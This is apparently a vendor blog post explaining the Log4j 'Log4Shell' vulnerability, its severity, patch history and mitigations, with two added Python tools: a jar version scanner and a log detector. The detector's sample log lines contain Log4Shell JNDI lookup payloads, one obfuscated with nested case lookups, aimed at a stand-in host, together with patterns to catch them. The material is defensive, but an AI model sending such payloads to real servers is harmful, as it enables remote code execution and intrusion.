The Log4j security vulnerability and fallout: It is bad, and will potentially get worse.
The recent Log4j security vulnerability has caused waves of panic across private and public sector organisations alike. Given the sheer scale of affected platforms and services, and the ease with which cybercriminals can exploit it, this is a vulnerability that every organisation should be aware of. But what do you need to know?
What is Log4j?
- Apache Log4j 2 is a widely used Java logging library; applications use it to record error messages.
- Log4j 2 is used across multiple systems and platforms, including Apple, Google, Microsoft, AWS, VMware, Cisco and many more!
- The vulnerability found in Log4j 2 is now also known as “Log4Shell”.
- The Log4j security vulnerability is a zero-day vulnerability that was first reported on 9th December 2021. (Evidence has since shown, however, that it was being exploited before this date.)
- The software is in widespread use – in at least 2,800 products used by both private organisations, and governments around the world.
- The flaw in Log4j is projected to be present in over 100 million instances globally.
- The vulnerability can allow unauthenticated remote code execution and access to any server using Log4j over the internet.
How was it Discovered?
- A security researcher in China (at a large eCommerce company) first reported the vulnerability to the Apache Foundation on November 24.
- The first reported attack was originally discovered on December 9, on servers that host the popular game Minecraft.
- Further analysis has shown that cybercriminals discovered the vulnerability earlier and have been exploiting it since at least 1st December 2021.
How bad is the Log4j Security Vulnerability?
- The Log4j security vulnerability is classified as severe. It has been given the maximum severity score of 10 out of 10 because of its potential for widespread exploitation and the ease with which malicious attackers can exploit it.
- Cybersecurity officials and experts initially described the flaw in the software as “perhaps the worst vulnerability ever discovered.”
- In a blog post published mid-December, researchers stated that they were seeing around 1,000 attempts per second actively trying to exploit the flaw.
- Security provider Check Point Software reported that it has discovered more than 1.2 million attempts to exploit the vulnerability, stretching across 44% of corporate networks around the world.
- Because of the extensive use of Log4j across the entire IT ecosystem, attackers have leaped at the opportunity to leverage this for a variety of purposes, including crypto jacking, ransomware and other attack methods.
- Security researchers have reported that there have already been hundreds of thousands, perhaps even millions, of attempts to exploit the vulnerability.
- One specific attack hit five victims in finance, banking, and software across the US, Israel, South Korea, Switzerland and Cyprus. In this specific attack, cybercriminals were able to exploit the flaw to install a Trojan malware, which downloads an executable file that then installs a cryptominer.
- Whilst the first wave of attacks has unfolded, U.S. cybersecurity officials have warned that some criminals and nation-state adversaries are likely to still be waiting to make use of their newfound access to critical systems.
- The huge scale of affected platforms and services means patching can be a complex and time-consuming process.
- Because of the complexity in patching, and its simplicity to exploit, this vulnerability is likely to continue to cause ongoing breaches for years to come.
“The log4j security vulnerability is the most serious vulnerability I have seen in my decades-long career,” Jen Easterly, The Director of US Cybersecurity and Infrastructure Security Agency, stated.
Multiple Software Patches
- Apache initially issued a patch for CVE-2021-44228, version 2.15, on December 6, 2021.
- Unfortunately, this patch left part of the vulnerability unfixed (tracked as CVE-2021-45046), resulting in a second patch, version 2.16, being released on December 13th.
- Apache went on to release a third patch, version 2.17, on December 17th to fix another related vulnerability, CVE-2021-45105.
- A fourth patch, 2.17.1, was released on December 28th to address another vulnerability, CVE-2021-44832.
What Should Organisations be Doing to Mitigate Risk?
Many companies are struggling to evaluate the true extent and impact of the Log4j exposure, as it is not obvious which applications and systems even use Log4j. However, it is critical to put measures in place immediately to both assess and protect your organisation.
- With such widespread use, hackers are still eagerly looking for unpatched systems that they can compromise.
- With cybercriminals continuously scanning the internet to find exposed targets, if you haven’t already started taking mitigation steps, then it may already be too late.
- Organisations affected by the Log4Shell vulnerability are advised to upgrade Log4j to the latest version from the Apache website. (Note: just updating Java is not enough to combat the flaw.)
- Third parties, such as Cisco, Oracle and VMware, have also launched their own patches and fixes to combat the vulnerability.
- Open-source security provider WhiteSource released a free developer tool called WhiteSource Log4j Detect that organisations can run to detect Log4j vulnerabilities.
- It is important to note that simply updating Log4j now will not resolve issues if an organisation is already compromised.
- If you believe you may be vulnerable, we encourage you to adopt the assumption that you have been breached, remove all physical network access to the affected server and continue your investigation offline from the network.
- If any anomalies are found, we recommend that you assume this is an active breach incident and that you respond accordingly.
- Using next-generation security tools, scanners, threat detection and behaviour analytics will help you to identify threats.
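One way to find out which applications on a host actually ship Log4j, as an added example that is not from the article and is not WhiteSource's Log4j Detect: a Python scanner that walks a directory, opens every .jar/.war/.ear archive (and any jar nested inside one), reads the log4j-core version from the file name or from the embedded pom.properties when the jar has been renamed, and classifies it against the fixed releases. The 2.17.1 threshold is the version the article names; the 2.3.2 and 2.12.4 values for the older Java 6/7 branches come from Apache's release history and are not mentioned in the article. The sample jars the script builds are constructed stand-ins, not real Log4j artefacts.

```python
"""Find log4j-core jars on disk (including jars nested inside .war/.ear files)
and classify each one against the fixed versions. Added example, not from the article."""
import io
import os
import re
import tempfile
import zipfile

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
LOG4J_CORE_NAME = re.compile(r"log4j-core-(\d+(?:\.\d+)+)\.jar$")
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Final fixed release per branch: 2.17.1 as named in the article; the Java 6 and
# Java 7 branches received equivalent backports (2.3.2 and 2.12.4).
FIXED_BY_BRANCH = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}
FIXED_DEFAULT = (2, 17, 1)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); qualifiers such as '-rc1' are ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", text)[:3])


def classify(version, has_jndi_lookup):
    """'patched' at or above the branch fix; 'jndi-removed' when JndiLookup.class was
    deleted from an older jar (blocks the RCE but not the later CVEs); else 'vulnerable'."""
    if version >= FIXED_BY_BRANCH.get(version[:2], FIXED_DEFAULT):
        return "patched"
    return "jndi-removed" if not has_jndi_lookup else "vulnerable"


def version_of(zf, names, location):
    """Version from the file name, or from pom.properties for renamed/shaded jars."""
    match = LOG4J_CORE_NAME.search(location.rsplit("/", 1)[-1])
    if match:
        return parse_version(match.group(1))
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return parse_version(line.split("=", 1)[1])
    return None


def inspect_archive(data, location, findings):
    """Record a finding for this archive if it is log4j-core, then recurse into archives it contains."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = version_of(zf, names, location)
        if version:
            findings.append((location, version, classify(version, JNDI_LOOKUP_CLASS in names)))
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                inspect_archive(zf.read(name), f"{location}!{name}", findings)


def scan_tree(root):
    """Return sorted (location, version, status) tuples for every log4j-core jar under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), os.path.relpath(path, root).replace(os.sep, "/"), findings)
    return sorted(findings)


def _jar_bytes(version, with_jndi_lookup):
    """Constructed stand-in for a log4j-core jar: pom.properties plus an optional placeholder class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"version={version}\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a real class
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed sample layout covering the cases a scan must tell apart."""
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)
    samples = {
        "log4j-core-2.14.1.jar": _jar_bytes("2.14.1", True),   # unpatched
        "log4j-core-2.16.0.jar": _jar_bytes("2.16.0", False),  # class removed, still below 2.17.1
        "logging.jar": _jar_bytes("2.12.1", True),             # renamed: version only in pom.properties
    }
    for name, data in samples.items():
        with open(os.path.join(lib, name), "wb") as fh:
            fh.write(data)
    with zipfile.ZipFile(os.path.join(root, "app", "webapp.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", _jar_bytes("2.17.1", True))


def demo():
    """Build the constructed tree in a temp directory and scan it."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    for location, version, status in demo():
        print(f"{status:13} {'.'.join(map(str, version)):8} {location}")
```

Run it against a real root (`scan_tree("/opt")`, for instance) rather than `demo()` to inventory a host; jars embedded as resources in uber-jars under other names will only be found if they keep their pom.properties, which is why the scan does not rely on file names alone.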
Stay Alert – Real-Time Monitoring – User & Behaviour Analytics
- Look for behaviour changes in your logs, review logs for impacted applications for unusual activity.
- Real-time change monitoring: see who, what, when and where any changes are made in your infrastructure.
- Use a solution that recognises past behavioural changes, and takes them into account when identifying potential vulnerabilities.
- Don’t ignore the alerts! Even with all of the tools deployed, often IT teams are so overwhelmed with alerts, they can be missed. If you’re suffering from alert fatigue, our dedicated managed services team can help.
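For the log review step above, an added example that is not from the article: a small detector run over constructed web-server log lines. Log4Shell fires when attacker-controlled text containing a Log4j JNDI lookup (`${jndi:...}`) reaches a vulnerable logger, so request fields carrying that syntax are what to alert on. A plain substring match misses lines where the literal has been split with Log4j's own `${lower:}`/`${upper:}` nested lookups, so the detector folds those first. The IP addresses, hostnames and timestamps in the sample are constructed.

```python
"""Flag log lines carrying a Log4j JNDI lookup. Added example, not from the article."""
import re
from typing import List, Tuple

# Constructed sample access-log lines: one benign request, a plain lookup in the
# User-Agent field, the same lookup split with nested case lookups, and a benign
# line that happens to contain an unrelated ${...} placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://probe.invalid/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 '
    '"${${lower:j}${upper:n}di:ldap://probe.invalid/b}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:04 +0000] "GET /price?q=${total} HTTP/1.1" 200 "curl/7.68"',
]

NESTED_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def fold_case_lookups(text: str) -> str:
    """Resolve ${lower:x} / ${upper:x} from the inside out until nothing changes."""
    while True:
        folded = NESTED_CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        if folded == text:
            return text
        text = folded


def is_suspicious(line: str) -> bool:
    """True if the line contains a JNDI lookup after folding nested case lookups."""
    return JNDI_LOOKUP.search(fold_case_lookups(line)) is not None


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, source IP) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        if is_suspicious(line):
            hits.append((number, line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for number, source in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup from {source}")
```

A hit here means someone sent the lookup syntax, not that the application was exploited; treat the source addresses and the affected hosts as the starting point for the "assume breach" investigation the article recommends, and note that pattern matching of this kind catches common forms only and does not replace patching.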
If you need help with the Log4j security vulnerability or need advice on what next-generation cyber security tools you should be using to protect your network, please get in touch with us on 01932 232345